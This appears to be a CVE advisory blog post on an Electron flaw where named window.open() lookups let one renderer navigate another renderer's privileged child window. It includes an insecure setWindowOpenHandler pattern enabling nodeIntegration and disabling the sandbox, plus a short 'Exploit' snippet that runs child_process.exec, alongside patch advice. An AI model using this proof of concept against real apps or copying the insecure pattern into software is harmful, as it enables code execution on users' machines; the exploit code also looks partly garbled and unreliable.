Listen to this Post
How the mentioned vulnerability works:
When a renderer process calls `window.open()` with a specific target name, Electron fails to scope the named-window lookup to the opener’s browsing context group. This allows a malicious renderer to navigate an existing child window that was opened by a completely different, unrelated renderer, provided both use the same target name. If that existing child window was originally created with more permissive `webPreferences` (e.g., via setWindowOpenHandler‘s `overrideBrowserWindowOptions` granting a privileged preload script, nodeIntegration: true, or sandbox: false), then the second renderer’s loaded content inherits those elevated permissions. The attack requires the application to open multiple top-level windows with differing trust levels and to use `setWindowOpenHandler` to elevate child window privileges. Applications that do not elevate child window privileges, use a single top‑level window, or deny `window.open()` for untrusted renderers are not affected. If `nodeIntegration: true` or `sandbox: false` are granted (contrary to security recommendations), the vulnerability can lead to arbitrary code execution. The fix introduces correct scoping of named‑window lookups per browsing context group.
dailycve form:
Platform: Electron
Version: Below 39.8.5
Vulnerability : Improper window scoping
Severity: Medium
date: 2026-04-07
Prediction: Already patched (42.0.0)
Analytics under What Undercode Say:
Check Electron version
electron --version
List all windows and their webPreferences (debug)
node -e "const {app, BrowserWindow} = require('electron'); app.whenReady().then(() => { console.log(BrowserWindow.getAllWindows().map(w => ({id: w.id, webPreferences: w.webPreferences}))); app.quit(); });"
Simulate unsafe setWindowOpenHandler (vulnerable pattern)
mainWindow.webContents.setWindowOpenHandler(({ url, frameName }) => {
return { action: 'allow', overrideBrowserWindowOptions: { webPreferences: { nodeIntegration: true, sandbox: false } } };
});
Exploit:
// Malicious renderer 1 opens a privileged child window named "targetWin"
window.open('https://trusted.site', 'targetWin');
// Malicious renderer 2 (untrusted) reuses same target name to navigate that child
const privilegedWin = window.open('https://evil.site', 'targetWin');
// Now privilegedWin loads evil content with elevated webPreferences (e.g., nodeIntegration)
privilegedWin.eval('require("child_process").exec("calc.exe")');
Protection from this CVE:
- Deny `window.open()` in untrusted renderers: `setWindowOpenHandler(() => ({ action: ‘deny’ }))`
– Never grant child windows more permissive `webPreferences` than their opener - Update to fixed versions: 42.0.0-alpha.5, 41.1.0, 40.8.5, or 39.8.5
- Avoid `nodeIntegration: true` and `sandbox: false` for any window
Impact:
- Cross‑renderer navigation of named child windows leading to privilege escalation
- Arbitrary code execution if child windows have `nodeIntegration: true` or `sandbox: false`
– Affects apps with multiple top‑level windows of differing trust levels that use `setWindowOpenHandler` to elevate child permissions
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

